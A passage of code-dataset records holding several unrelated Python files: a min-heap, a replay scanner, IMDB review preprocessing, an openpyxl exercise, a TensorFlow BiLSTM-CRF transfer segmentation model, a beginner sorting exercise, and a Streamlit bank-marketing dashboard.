self.count)\r\n\t\tself.count -= 1\r\n\r\n\t\tself.sink()\r\n\t\treturn item\r\n\r\n\tdef sink(self):\r\n\t\t'''\r\n\t\tbrings item on top of heap to the position where it belongs\r\n\t\t:complexity: best = O(1), worst = O(log k)\r\n\t\t'''\r\n\t\tk = 1\r\n\t\twhile (k*2 <= self.count):\r\n\t\t\tchild = self.get_smallest_child(k)\r\n\t\t\tif self.array[k][0] < self.array[child][0]:\r\n\t\t\t\tbreak\t\r\n\t\t\tself.swap(k, child)\r\n\t\t\tk = child\r\n\r\n\tdef get_smallest_child(self, i):\r\n\t\t'''\r\n\t\tparam i: integer, position of node\r\n\t\treturn: integer, position of child with smallest key\r\n\t\tcomplexity: O(1)\r\n\t\t'''\r\n\t\ttry:\r\n\t\t\tassert (i*2+1)<=self.count\r\n\t\texcept AssertionError:\r\n\t\t\treturn i*2\r\n\t\tif self.array[i*2] < 
self.array[i*2+1]:\r\n\t\t\treturn i*2\r\n\t\telse:\r\n\t\t\treturn i*2+1\r\n\r\ndef menu():\r\n    '''\r\n    \r\n    '''\r\n    quit = False\r\n    heap = MinHeap()\r\n    while not quit:\r\n        commands = [0, 1, 2, 3, 4]\r\n        print(\r\n            '''\r\n            ---Binary Tree Class menu---\r\n            Available commands:\r\n            1 \tappend \r\n            2 \tserve\r\n            3 \tprint\r\n            4     size\r\n            0 \tquit\r\n            '''\r\n            )\r\n\r\n        command = input('Enter command: ')\r\n        try:\r\n        \tcommand = int(command)\r\n        \tassert command in commands\r\n        except (ValueError, AssertionError):\r\n            print('Unknown command, try again')\r\n        else:\r\n            if command == 1:\r\n            \titem = input('Enter item: ')\r\n            \theap.append([item])\r\n            elif command == 2:\r\n                print(heap.serve())\r\n            elif command == 3:\r\n                print(str(heap))\r\n            elif command == 4:\r\n                print(len(heap))\r\n            elif command == 0:\r\n                quit = True\r\n\r\ndef main():\r\n\tmenu()\r\n\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"minHeap.py","file_name":"minHeap.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"78310472","text":"import sys\nimport os\nimport json\nimport utils\nimport activity\n\ndef main():\n    if (len(sys.argv) <3):\n        print(\"\")\n        print(\"\")\n        print('usage: python scanReplay.py  ')\n        print(\"\")\n        print('...where command can be :')\n        print('    show_activity      # show what happens at each DP')\n        sys.exit()\n    replay_json_path = sys.argv[1]\n    command = sys.argv[2]\n    \n    if os.path.exists(replay_json_path):\n        if not utils.verify_path_is_replay_json(replay_json_path):\n            print(\"replay json file not valid.\")\n            sys.exit()\n        if command == \"show_activity\":\n            show_activity(replay_json_path)\n        else:\n            print(\"\")\n            print(\"ERROR - subcommand \"+ command + \" not recognized.\")\n    else:\n        print(\"given file does not exist:\", replay_json_path)\n\ndef show_activity(replay_json_path):\n    print(\"extracting game activity from replay json file\") \n    fname = os.path.basename(replay_json_path)\n    parts = fname.split(\".\")\n    replay_name = parts[0]\n    print(\"\")\n    print(\"replay name : \" + replay_name)\n    activity.show_activity_via_replay_json(replay_json_path)\n\n\nif __name__ == '__main__':\n    main()","sub_path":"py/scanReplayJson.py","file_name":"scanReplayJson.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"474206867","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 15 08:52:33 2020\n\n@author: u3w1\n\"\"\"\n\n# https://ai.stanford.edu/~amaas/data/sentiment/\n# https://www.imdb.com/interfaces/\n\nimport os\nimport pandas as pd\nfrom requests import get\n\ndef get_id(s):\n    url = s[26:35]\n    return url\n\n#extract the movies' basic and ratings data\ndef get_dataset(url_urls, url_basics, url_ratings, nm_file):\n    \n    urls = open(url_urls, 'r').read()\n    urls_df = urls.split('\\n')\n    urls_df = pd.DataFrame(urls_df, columns=['urls'])\n    urls_df = urls_df.loc[urls_df.urls != '']\n    urls_df['id'] = urls_df['urls'].apply(get_id)\n    \n    title_basics = pd.read_csv(url_basics, sep='\\t', header=0)\n    title_ratings = pd.read_csv(url_ratings, sep='\\t', header=0)\n\n    df_basics = urls_df.merge(title_basics, left_on='id', right_on='tconst')\n    \n    #check the identifiers that were not matched between the datasets\n    erros = set(urls_df.id) - set(df_basics.id)\n    \n    DE, PARA = [], []\n    for id_ in erros:\n        url = 'http://www.imdb.com/title/' + id_\n        response = get(url)\n        index_new_id = response.text.find('app-argument')\n        new_id = response.text[index_new_id + 27:index_new_id + 36]\n        DE.append(id_)\n        PARA.append(new_id)\n    \n    def get_new_id(s):\n        try:\n            list_index = DE.index(s)\n            id_ = PARA[list_index]\n        except:\n            id_ = s \n        return id_\n\n    urls_df['id_new'] = urls_df['id'].apply(get_new_id)\n\n    df_basics = urls_df.merge(title_basics, left_on='id_new', right_on='tconst', how='left')\n    df_basics.to_csv('basics_' + nm_file + '.csv')\n    \n    df_ratings = urls_df.merge(title_ratings, left_on='id_new', right_on='tconst', how='left')\n    df_ratings.to_csv('ratings_' + nm_file + '.csv')\n    \n    return df_basics, df_ratings\n\nget_dataset('./Desktop/Imdb datasets/aclImdb/train/urls_pos.txt',\n            './Desktop/Imdb datasets/title_basics.tsv',\n            './Desktop/Imdb datasets/title_ratings.tsv',\n            'train_positive')\n\nget_dataset('./Desktop/Imdb datasets/aclImdb/train/urls_neg.txt',\n            './Desktop/Imdb datasets/title_basics.tsv',\n            './Desktop/Imdb datasets/title_ratings.tsv',\n            'train_negative')\n\nget_dataset('./Desktop/Imdb datasets/aclImdb/test/urls_pos.txt',\n            './Desktop/Imdb datasets/title_basics.tsv',\n            './Desktop/Imdb datasets/title_ratings.tsv',\n            'test_positive')\n\nget_dataset('./Desktop/Imdb datasets/aclImdb/test/urls_neg.txt',\n            './Desktop/Imdb datasets/title_basics.tsv',\n            './Desktop/Imdb datasets/title_ratings.tsv',\n            'test_negative')\n\n#extract the text data from the directories\ndef get_text(directory, nm_file):\n    comments = pd.DataFrame()\n    for filename in os.listdir(directory):\n        # print(filename)\n        if filename.endswith(\".txt\"):\n            f = open(directory + '/' + filename, encoding=\"utf8\")\n            lines = f.read()\n            comments = comments.append({'index': filename.split('_')[0],\n                                        'sentiment': filename.split('_')[1].split('.')[0],\n                                        'text': lines}, ignore_index=True)\n            continue\n        else:\n            continue\n    \n    comments['index'] = comments['index'].astype(int)\n    comments = comments.set_index('index')\n    comments.to_csv('text_' + nm_file + '.csv')\n    \n    return comments\n\nget_text('C:/Users/u3w1/Desktop/Imdb datasets/aclImdb/train/pos', 'train_positive')\nget_text('C:/Users/u3w1/Desktop/Imdb datasets/aclImdb/train/neg', 'train_negative')\nget_text('C:/Users/u3w1/Desktop/Imdb datasets/aclImdb/test/pos', 'test_positive')\nget_text('C:/Users/u3w1/Desktop/Imdb datasets/aclImdb/test/neg', 'test_negative')\n#get for unsupervised\nget_text('C:/Users/u3w1/Desktop/Imdb datasets/aclImdb/train/unsup', 'train_unsup')\n\n#join the features into a single dataframe\ndef join_features(nm_file):\n    basics = pd.read_csv('basics_' + nm_file + '.csv', index_col=0)\n    ratings = pd.read_csv('ratings_' + nm_file + '.csv', index_col=0)\n    comments = pd.read_csv('text_' + nm_file + '.csv', index_col=0)\n\n    df = comments.merge(basics, left_on=comments.index, right_on=basics.index)\n    df = df.merge(ratings, left_on='key_0', right_on=ratings.index)\n\n    df.to_csv(nm_file+ '.csv')\n    \n    return df\n\ndf_train_pos = join_features('train_positive')\ndf_train_neg = join_features('train_negative')\njoin_features('test_positive')\njoin_features('test_negative')\n\n#join the negative and positive data\ndef join_pos_neg(nm_file):\n    pos = pd.read_csv(nm_file + '_positive.csv', index_col=0)\n    neg = pd.read_csv(nm_file + '_negative.csv', index_col=0)\n    \n    df = pd.concat([pos, neg])\n    df.reset_index(inplace=True)\n    \n    df.to_csv(nm_file + '.csv')\n    \n    return df\n\njoin_pos_neg('train')\njoin_pos_neg('test')\n\n#generate all the text content for unsupervised training\ntrain_positive = pd.read_csv('text_train_positive.csv', index_col=0)\ntrain_negative = pd.read_csv('text_train_negative.csv', index_col=0)\ntrain_unsup = pd.read_csv('text_train_unsup.csv', index_col=0)\n\ntest_positive = pd.read_csv('text_test_positive.csv', index_col=0)\ntest_negative = pd.read_csv('text_test_negative.csv', index_col=0)\n\ntext_train = pd.concat([train_positive, train_negative, train_unsup])\ntext_train_labeled = pd.concat([train_positive, train_negative])\ntext_test = pd.concat([test_positive, test_negative])\n\ntext_train['text'] = text_train['text'].str.replace('<br />', '')\ntext_train_labeled['text'] = text_train_labeled['text'].str.replace('<br />', '')\ntext_test['text'] = text_test['text'].str.replace('<br />
', '')\n\ntext_train['label'] = 'negative'\ntext_train.loc[text_train['sentiment']>5, 'label'] = 'positive'\ntext_train_labeled['label'] = 'negative'\ntext_train_labeled.loc[text_train['sentiment']>5, 'label'] = 'positive'\ntext_test['label'] = 'negative'\ntext_test.loc[text_test['sentiment']>5, 'label'] = 'positive'\n\ntext_train = text_train[['label', 'text']]\ntext_train['text'] = text_train['text'].astype(str)\ntext_train.to_csv('df_fastai.csv', index=False)\n\ntext_train_labeled = text_train_labeled[['label', 'text']]\ntext_train_labeled['text'] = text_train_labeled['text'].astype(str)\ntext_train_labeled.to_csv('text_train_labeled.csv', index=False)\n\ntext_test = text_test[['label', 'text']]\ntext_test['text'] = text_test['text'].astype(str)\ntext_test.to_csv('text_test.csv', index=False)\n","sub_path":"Imdb_preprocessing.py","file_name":"Imdb_preprocessing.py","file_ext":"py","file_size_in_byte":6461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"552124705","text":"import openpyxl\n\nwb = openpyxl.load_workbook('text.xlsx')\nsheet = wb.active\n\nwith open('geust1.txt', 'w') as file1:\n for r in range(1, 6):\n file1.write(sheet.cell(row=r, column=1).value)\n\nmax_row = sheet.max_row\nwith open('dictionary1.txt', 'w') as file2:\n for r in range(1, max_row + 1):\n file2.write(sheet.cell(row=r, column=2).value)\n\nprint(\"Done!\")","sub_path":"AutomateTheBoringStuffWithPython/Ch12.WorkingWithExcelSpreadsheets/12.13.5_spreadsheetToTextFiles.py","file_name":"12.13.5_spreadsheetToTextFiles.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"456444200","text":"# encoding=utf-8\n# Project: transfer_cws\n# Author: xingjunjie\n# Create Time: 07/11/2017 11:04 AM on PyCharm\n\nimport tensorflow as tf\nfrom utils import Progbar\nfrom data_utils import pad_sequences, minibatches, get_chunks, minibatches_evaluate\nimport numpy as np\nimport os\nfrom functools import partial\nfrom penalty import MKL, CMD, MMD, gaussian_kernel_matrix, _de_pad\n\n\nclass Model(object):\n def __init__(self, args, ntags, nwords, ntarwords=None, src_embedding=None,\n target_embedding=None, logger=None, src_batch_size=None):\n self.args = args\n self.src_embedding = src_embedding\n self.target_embedding = target_embedding\n self.ntags = ntags\n self.nwords = nwords\n self.ntarwords = ntarwords\n self.logger = logger\n self.init_lr = args.learning_rate\n self.src_batch_size = src_batch_size\n self.target_batch_size = self.args.batch_size - self.src_batch_size\n\n self.describe = \"shared lstm only, with mmd, model-2\"\n\n self.initializer = tf.contrib.layers.xavier_initializer()\n self.l2_regularizer = tf.contrib.layers.l2_regularizer(self.args.l2_ratio)\n\n self.info = {\n 'dev': [],\n 'train': [],\n 'loss': [],\n 'test': None\n }\n\n def add_placeholder(self):\n with tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n self.batch_size = tf.placeholder(tf.int32, shape=[])\n\n # shape = [batch size, max length of sequence in batch]\n self.src_word_ids = tf.placeholder(tf.int32, shape=[None, None])\n\n # shape = [batch size, max length of sequence in batch]\n self.target_word_ids = tf.placeholder(tf.int32, shape=[None, None])\n\n # shape = [batch size]\n self.sequence_lengths = tf.placeholder(tf.int32, shape=[None])\n\n # shape = [batch size]\n self.src_sequence_lengths = tf.placeholder(tf.int32, shape=[None])\n\n # shape = [batch size]\n self.target_sequence_lengths = 
tf.placeholder(tf.int32, shape=[None])\n\n # shape = [batch size, max length of sequence in batch]\n self.labels = tf.placeholder(tf.int32, shape=[None, None])\n\n # hyper parameters\n self.dropout = tf.placeholder(tf.float32, shape=[])\n\n self.lr = tf.placeholder(tf.float32, shape=[])\n\n self.is_training = tf.placeholder(tf.bool)\n\n def get_feed_dict(self, sentences, labels, target_words, lr=None, dropout=None, src_batch_size=None, mode=\"all\",\n is_training=True):\n if mode == 'all':\n all_words_ids, sequence_lengths = pad_sequences(sentences + target_words, pad_tok=0)\n\n words_ids = all_words_ids[:src_batch_size] + [[0] * len(all_words_ids[0])] * (\n self.args.batch_size - src_batch_size)\n src_sequence_lengths = sequence_lengths[:src_batch_size] + [0] * (self.args.batch_size - src_batch_size)\n target_words_ids = [[0] * len(all_words_ids[0])] * src_batch_size + all_words_ids[src_batch_size:]\n target_sequence_lengths = [0] * src_batch_size + sequence_lengths[src_batch_size:]\n\n feed_dict = {\n self.src_word_ids: words_ids,\n self.src_sequence_lengths: src_sequence_lengths,\n self.target_word_ids: target_words_ids,\n self.target_sequence_lengths: target_sequence_lengths,\n self.sequence_lengths: sequence_lengths,\n self.batch_size: self.args.batch_size,\n self.is_training: is_training,\n }\n elif mode == 'target':\n target_words_ids, target_sequence_lengths = pad_sequences(target_words, pad_tok=0)\n sequence_lengths = target_sequence_lengths\n feed_dict = {\n self.src_word_ids: np.zeros_like(target_words_ids),\n self.src_sequence_lengths: np.zeros_like(target_sequence_lengths),\n self.target_word_ids: target_words_ids,\n self.target_sequence_lengths: target_sequence_lengths,\n self.sequence_lengths: target_sequence_lengths,\n self.batch_size: self.args.batch_size,\n self.is_training: is_training,\n }\n\n if labels is not None:\n labels, _ = pad_sequences(labels, 0)\n feed_dict[self.labels] = labels\n\n if lr is not None:\n feed_dict[self.lr] = lr\n\n if dropout is not None:\n feed_dict[self.dropout] = dropout\n\n return feed_dict, sequence_lengths\n\n def add_src_word_embeddings_op(self):\n with tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n with tf.variable_scope(\"src_word\"):\n _word_embeddings = tf.get_variable('embedding', shape=[self.nwords, self.args.embedding_size],\n initializer=self.initializer,\n trainable=not self.args.disable_src_embed_training,\n regularizer=self.l2_regularizer)\n word_embeddings = tf.nn.embedding_lookup(_word_embeddings, self.src_word_ids)\n\n if self.args.share_embed:\n target_word_embeddings = tf.nn.embedding_lookup(_word_embeddings, self.target_word_ids)\n self.target_word_embeddings = tf.nn.dropout(target_word_embeddings, self.dropout)\n\n self.src_word_embeddings = tf.nn.dropout(word_embeddings, self.dropout)\n\n def add_target_word_embeddings_op(self):\n with tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n with tf.variable_scope(\"target_word\"):\n _word_embeddings = tf.get_variable('embedding', shape=[self.ntarwords, self.args.embedding_size],\n initializer=self.initializer, regularizer=self.l2_regularizer)\n word_embeddings = tf.nn.embedding_lookup(_word_embeddings, self.target_word_ids)\n\n if self.args.use_pretrain_target:\n pre_train_size = self.target_embedding.shape[0]\n self.target_embedding_init = _word_embeddings[:pre_train_size].assign(self.target_embedding)\n\n self.target_word_embeddings = tf.nn.dropout(word_embeddings, self.dropout)\n\n def add_shared_lstm(self):\n with 
tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n with tf.variable_scope('lstm'):\n cell_fw = tf.contrib.rnn.LSTMCell(self.args.lstm_hidden)\n cell_bw = tf.contrib.rnn.LSTMCell(self.args.lstm_hidden)\n (output_fw, output_bw), _ = tf.nn.bidirectional_dynamic_rnn(\n cell_fw, cell_bw, self.src_word_embeddings, sequence_length=self.src_sequence_lengths,\n dtype=tf.float32)\n outout = tf.concat([output_fw, output_bw], axis=-1)\n self.src_after_shared = tf.nn.dropout(outout, self.dropout)\n\n (e_output_fw, e_output_bw), _ = tf.nn.bidirectional_dynamic_rnn(\n cell_fw, cell_bw, self.target_word_embeddings, sequence_length=self.target_sequence_lengths,\n dtype=tf.float32)\n e_outout = tf.concat([e_output_fw, e_output_bw], axis=-1)\n self.target_after_shared = tf.nn.dropout(e_outout, self.dropout)\n\n with tf.variable_scope('lstm_linear'):\n W = tf.get_variable(\"W\", shape=[2 * self.args.lstm_hidden, self.ntags],\n dtype=tf.float32, initializer=self.initializer, regularizer=self.l2_regularizer)\n b = tf.get_variable(\"b\", shape=[self.ntags], dtype=tf.float32,\n initializer=self.initializer, regularizer=self.l2_regularizer)\n ntime_steps = tf.shape(self.src_after_shared)[1]\n output = tf.reshape(self.src_after_shared, [-1, 2 * self.args.lstm_hidden])\n pred = tf.matmul(output, W) + b\n self.src_logits = tf.reshape(pred, [-1, ntime_steps, self.ntags])\n\n ntime_steps = tf.shape(self.target_after_shared)[1]\n output = tf.reshape(self.target_after_shared, [-1, 2 * self.args.lstm_hidden])\n pred = tf.matmul(output, W) + b\n self.target_logits = tf.reshape(pred, [-1, ntime_steps, self.ntags])\n\n def add_loss_op(self):\n with tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n # CRF loss\n with tf.variable_scope('src_crf'):\n self.src_log_likelihood, self.src_transition_params = tf.contrib.crf.crf_log_likelihood(\n self.src_logits, self.labels, self.src_sequence_lengths\n )\n\n with tf.variable_scope('target_crf'):\n self.target_log_likelihood, self.target_transition_params = tf.contrib.crf.crf_log_likelihood(\n self.target_logits, self.labels, self.target_sequence_lengths\n )\n self.src_crf_loss = tf.reduce_mean(-self.src_log_likelihood[:self.src_batch_size])\n self.target_crf_loss = tf.reduce_mean(-self.target_log_likelihood[self.src_batch_size:])\n\n # MMD loss\n if self.args.penalty_ratio > 0:\n self.src_depad = _de_pad(self.src_after_shared, self.src_sequence_lengths)\n self.target_depad = _de_pad(self.target_after_shared, self.target_sequence_lengths)\n\n if self.args.penalty == 'mmd':\n with tf.name_scope('mmd'):\n sigmas = [1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1, 5, 10, 15, 20, 25, 30, 35, 100, 1e3, 1e4, 1e5,\n 1e6]\n gaussian_kernel = partial(gaussian_kernel_matrix, sigmas=tf.constant(sigmas))\n loss_value = MMD(self.src_depad, self.target_depad, kernel=gaussian_kernel)\n mmd_loss = tf.maximum(1e-4, loss_value)\n\n self.penalty_loss = self.args.penalty_ratio * mmd_loss\n elif self.args.penalty == 'kl':\n self.src_depad_sm = tf.nn.softmax(self.src_depad)\n self.target_depad_sm = tf.nn.softmax(self.target_depad)\n self.kl_loss = MKL(self.src_depad_sm, self.target_depad_sm)\n self.penalty_loss = self.args.penalty_ratio * self.kl_loss\n elif self.args.penalty == 'cmd':\n self.cmd_loss = CMD(self.src_depad, self.target_depad, 5)\n self.penalty_loss = self.args.penalty_ratio * self.cmd_loss\n else:\n self.logger.critical(\"Penalty Type Invalid.\")\n\n temp = self.src_crf_loss + self.target_crf_loss + self.penalty_loss\n else:\n temp = self.src_crf_loss + self.target_crf_loss\n\n if 
self.args.use_l2:\n self.l2_loss = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n temp1 = temp + self.l2_loss\n else:\n temp1 = temp\n\n if not self.args.share_crf:\n self.crf_l2_loss = tf.nn.l2_loss(\n self.target_transition_params - self.src_transition_params) * self.args.crf_l2_ratio\n temp2 = temp1 + self.crf_l2_loss\n else:\n temp2 = temp1\n\n self.loss = temp2\n\n def add_train_op(self):\n with tf.device('/gpu:{:d}'.format(self.args.gpu_device)):\n with tf.variable_scope('train'):\n if self.args.optim.lower() == 'adam':\n optimizer = tf.train.AdamOptimizer(self.lr)\n elif self.args.optim.lower() == 'sgd':\n optimizer = tf.train.GradientDescentOptimizer(self.lr)\n else:\n raise NotImplementedError(\"Unknown optim {}\".format(self.args.optim))\n\n self.train_op = optimizer.minimize(self.loss)\n\n def add_init_op(self):\n self.init = tf.global_variables_initializer()\n\n def build(self):\n self.add_placeholder()\n self.add_src_word_embeddings_op()\n if not self.args.share_embed:\n self.add_target_word_embeddings_op()\n self.add_shared_lstm()\n self.add_loss_op()\n self.add_train_op()\n self.add_init_op()\n self.logger.critical(\"Model info: {}\".format(self.describe))\n\n def predict_batch(self, sess, words=None, target_words=None, mode='target', is_training=True):\n feed_dict, sequence_lengths = self.get_feed_dict(words, None, target_words=target_words, dropout=1.0, mode=mode,\n is_training=is_training)\n\n viterbi_sequences = []\n logits, transition_params = sess.run([self.target_logits, self.target_transition_params],\n feed_dict=feed_dict)\n for logit, sequence_length in zip(logits, sequence_lengths):\n logit = logit[:sequence_length]\n viterbi_sequence, viterbi_score = tf.contrib.crf.viterbi_decode(\n logit, transition_params\n )\n viterbi_sequences += [viterbi_sequence]\n\n return viterbi_sequences, sequence_lengths\n\n def run_epoch(self, sess, src_train, src_dev, tags, target_train, target_dev, n_epoch_noimprove):\n nbatces = (len(target_train) + self.target_batch_size - 1) // self.target_batch_size\n prog = Progbar(target=nbatces)\n total_loss = 0\n\n src = minibatches(src_train, self.src_batch_size, circle=True)\n target = minibatches(target_train, self.target_batch_size, circle=True)\n\n for i in range(nbatces):\n src_words, src_tags, _ = next(src)\n target_words, target_tags, _ = next(target)\n labels = src_tags + target_tags\n\n feed_dict, _ = self.get_feed_dict(src_words, labels, target_words, self.args.learning_rate,\n self.args.dropout, self.src_batch_size, is_training=True)\n\n if self.args.penalty_ratio > 0:\n _, src_crf_loss, target_crf_loss, penalty_loss, loss = sess.run(\n [self.train_op, self.src_crf_loss, self.target_crf_loss, self.penalty_loss, self.loss],\n feed_dict=feed_dict)\n try:\n prog.update(i + 1,\n [(\"train loss\", loss[0]), (\"src crf\", src_crf_loss), (\"target crf\", target_crf_loss),\n (\"{} loss\".format(self.args.penalty), penalty_loss)])\n except:\n prog.update(i + 1,\n [(\"train loss\", loss), (\"src crf\", src_crf_loss), (\"target crf\", target_crf_loss),\n (\"{} loss\".format(self.args.penalty), penalty_loss)])\n else:\n _, src_crf_loss, target_crf_loss, loss = sess.run(\n [self.train_op, self.src_crf_loss, self.target_crf_loss, self.loss],\n feed_dict=feed_dict)\n try:\n prog.update(i + 1,\n [(\"train loss\", loss[0]), (\"src crf\", src_crf_loss), (\"target crf\", target_crf_loss)])\n except:\n prog.update(i + 1,\n [(\"train loss\", loss), (\"src crf\", src_crf_loss), (\"target crf\", target_crf_loss)])\n total_loss += loss\n\n 
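        # [editor's note, added] the lines below run once per epoch: the model is
        # evaluated on the full target-domain training set and then on the dev set;
        # the dev F1 returned from run_epoch appears to be what train() uses for
        # checkpointing and early stopping.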
self.info['loss'] += [total_loss / nbatces]\n acc, p, r, f1 = self.run_evaluate(sess, target_train, tags, target='target')\n self.info['dev'].append((acc, p, r, f1))\n self.logger.critical(\n \"target train acc {:04.2f} f1 {:04.2f} p {:04.2f} r {:04.2f}\".format(100 * acc, 100 * f1, 100 * p,\n 100 * r))\n acc, p, r, f1 = self.run_evaluate(sess, target_dev, tags, target='target')\n self.info['dev'].append((acc, p, r, f1))\n self.logger.info(\n \"dev acc {:04.2f} f1 {:04.2f} p {:04.2f} r {:04.2f}\".format(100 * acc, 100 * f1, 100 * p, 100 * r))\n return acc, p, r, f1\n\n def run_evaluate(self, sess, test, tags, target='src'):\n accs = []\n correct_preds, total_correct, total_preds = 0., 0., 0.\n nbatces = (len(test) + self.args.batch_size - 1) // self.args.batch_size\n prog = Progbar(target=nbatces)\n for i, (words, labels, target_words) in enumerate(minibatches(test, self.args.batch_size)):\n if target == 'src':\n labels_pred, sequence_lengths = self.predict_batch(sess, words, mode=target, is_training=False)\n else:\n labels_pred, sequence_lengths = self.predict_batch(sess, None, words, mode=target, is_training=False)\n\n for lab, label_pred, length in zip(labels, labels_pred, sequence_lengths):\n lab = lab[:length]\n lab_pred = label_pred[:length]\n accs += [a == b for (a, b) in zip(lab, lab_pred)]\n lab_chunks = set(get_chunks(lab, tags))\n lab_pred_chunks = set(get_chunks(lab_pred, tags))\n correct_preds += len(lab_chunks & lab_pred_chunks)\n total_preds += len(lab_pred_chunks)\n total_correct += len(lab_chunks)\n\n prog.update(i + 1)\n\n p = correct_preds / total_preds if correct_preds > 0 else 0\n r = correct_preds / total_correct if correct_preds > 0 else 0\n f1 = 2 * p * r / (p + r) if correct_preds > 0 else 0\n acc = np.mean(accs)\n return acc, p, r, f1\n\n def predict(self, sess, test, id_to_tag, id_to_word):\n nbatces = (len(test) + self.args.batch_size - 1) // self.args.batch_size\n prog = Progbar(target=nbatces)\n with open(self.args.predict_out, 'w+', encoding='utf8') as outfile:\n for i, (words, target_words, true_words) in enumerate(minibatches_evaluate(test, self.args.batch_size)):\n labels_pred, sequence_lengths = self.predict_batch(sess, words)\n\n for word, true_word, label_pred, length in zip(words, true_words, labels_pred, sequence_lengths):\n true_word = true_word[:length]\n lab_pred = label_pred[:length]\n\n for item, tag in zip(true_word, lab_pred):\n outfile.write(item + '\\t' + id_to_tag[tag] + '\\n')\n outfile.write('\\n')\n\n prog.update(i + 1)\n\n def train(self, src_train, src_dev, tags, target_train, target_dev, src_batch_size, target_batch_size):\n best_score = -1e-4\n tf_config = tf.ConfigProto()\n tf_config.gpu_options.allow_growth = True\n tf_config.gpu_options.per_process_gpu_memory_fraction = self.args.gpu_frac\n tf_config.allow_soft_placement = True\n with tf.Session(config=tf_config) as sess:\n sess.run(self.init)\n if self.args.use_pretrain_src:\n sess.run(self.src_embedding_init)\n if self.args.use_pretrain_target and self.args.flag == 1:\n sess.run(self.target_embedding_init)\n\n nepoch_no_imprv = 0\n for epoch in range(self.args.epoch):\n self.logger.info(\"Epoch : {}/{}\".format(epoch + 1, self.args.epoch))\n\n acc, p, r, f1 = self.run_epoch(sess, src_train, src_dev, tags, target_train, target_dev,\n nepoch_no_imprv)\n\n self.args.learning_rate *= self.args.lr_decay\n\n if f1 > best_score:\n nepoch_no_imprv = 0\n if not os.path.exists(self.args.model_output):\n os.makedirs(self.args.model_output)\n saver = tf.train.Saver()\n saver.save(sess, 
self.args.model_output)\n                    best_score = f1\n                    self.logger.info(\"New best score: {}\".format(f1))\n                else:\n                    nepoch_no_imprv += 1\n                    if nepoch_no_imprv >= self.args.nepoch_no_imprv:\n                        self.logger.info(\"Early stopping {} epochs without improvement\".format(nepoch_no_imprv))\n                        break\n\n            return self.evaluate(target_dev, tags, target='target')\n\n    def evaluate(self, test, tags, target='src'):\n        saver = tf.train.Saver()\n        tf_config = tf.ConfigProto()\n        tf_config.gpu_options.allow_growth = True\n        tf_config.gpu_options.per_process_gpu_memory_fraction = self.args.gpu_frac\n        tf_config.allow_soft_placement = True\n        with tf.Session(config=tf_config) as sess:\n            self.logger.info(\"Testing model over test set\")\n            saver.restore(sess, self.args.model_output)\n            acc, p, r, f1 = self.run_evaluate(sess, test, tags, target=target)\n            self.info['test'] = (acc, p, r, f1)\n            self.logger.info(\"- test acc {:04.2f} - f1 {:04.2f}\".format(100 * acc, 100 * f1))\n            return acc, p, r, f1\n","sub_path":"model_2.py","file_name":"model_2.py","file_ext":"py","file_size_in_byte":21129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"137300454","text":"'''\nWrite a program that reads three integers as input, one number per line,\nand prints them to the console on three lines: first the maximum, then the minimum, then the remaining number.\n\nDuplicate numbers may appear in the input.\n'''\n\na = int(input())\nb = int(input())\nc = int(input())\n\nif a > b:\n    max = a\n    min = b\nelse:\n    max = b\n    min = a\n\nif max < c:\n    mid = max\n    max = c\nelif c > min:\n    mid = c\nelse:\n    mid = min\n    min = c\n\nprint(max)\nprint(min)\nprint(mid)\n\n\n# another variant\nl = [int(input()) for _ in range(3)]\n\nl.sort()\nprint(l[2])\nprint(l[0])\nprint(l[1])\n","sub_path":"labs/1_part/1. 
Операторы, переменные, типы данных, условия/1.12 Задачи по материалам блока/1.12.5.py","file_name":"1.12.5.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"586574379","text":"import streamlit as st\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport seaborn as sns\nimport plotly.express as px\n\npath = '/home/romulo/Documentos/projetos_ds/telemarketing_bank/bank-full-dates.csv'\nbank_data = pd.read_csv(path)\nbank_data['lc_date'] = pd.to_datetime(bank_data['lc_date'], format='%d%b%Y')\nbank_data.loc[(bank_data['pdays'] == -1), 'pdays'] = 0\nyes_df = bank_data.loc[(bank_data['y'] == 'yes'), :]\nno_df = bank_data.loc[(bank_data['y'] == 'no'), :]\n\nst.title('Bank marketing analysis dashboard')\nst.markdown('Data set source:')\nst.write('I got this data set from the UCI Machine Learning Repository; it was made available with the article Moro et al., 2014.')\n\nst.sidebar.title('What do you want to see?')\nst.sidebar.write('Here are some options so you can navigate through this dashboard.')\noption = st.sidebar.selectbox('Options:', ('Data Summary', 'Age', 'Job', 'Duration',\n 'Education', 'Default', 'Housing',\n 'Loan', 'Contact', 'Previous outcome',\n 'Previous campaign', 'Campaign',\n 'Last contact date', 'Campaign response',\n 'Correlation heatmap'))\n\nif option == 'Data Summary':\n st.header('Data Summary')\n st.write('Here are some summary calculations of the data; I split it into 3 dataframes for better understanding.')\n if st.sidebar.checkbox('Raw data sets'):\n st.subheader('Bank data')\n st.dataframe(bank_data.head())\n st.subheader('yes_df:')\n st.dataframe(yes_df.head())\n st.subheader('no_df:')\n st.dataframe(no_df.head())\n\n if st.sidebar.checkbox('Summary calculations'):\n st.subheader('Bank data summary:')\n st.table(bank_data.describe())\n st.subheader('yes_df summary:')\n st.table(yes_df.describe())\n st.subheader('no_df summary:')\n st.table(no_df.describe())\n else: st.write('Pick something to see in the 